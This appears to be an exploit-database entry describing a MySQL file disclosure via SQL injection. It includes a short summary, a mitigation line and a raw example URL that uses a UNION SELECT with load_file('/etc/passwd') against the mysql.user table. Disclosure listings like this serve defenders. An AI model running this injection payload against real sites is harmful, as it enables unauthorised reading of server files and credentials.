header-logo
Suggest Exploit
vendor:
N/A
by:
CrAzY CrAcKeR
9
CVSS
HIGH
File Disclosure
200
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

MySQL File Disclosure Vulnerability

This vulnerability allows an attacker to read arbitrary files on the server by exploiting a SQL injection vulnerability in the application. The attacker can use the UNION operator to read the contents of the file. The attacker can also use the LOAD_FILE() function to read the contents of the file.

Mitigation:

The application should be tested for SQL injection vulnerabilities and the application should be patched to prevent the exploitation of this vulnerability.
Source

Exploit-DB raw data:

=================================================

Discovered By: CrAzY CrAcKeR

Email: CrAzY_CrAcKeR(at)hotmail(dot)com

================================================

example:-

http://www.example.in/index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user

================================================

Navigation

Suggest Exploit

Services By CQR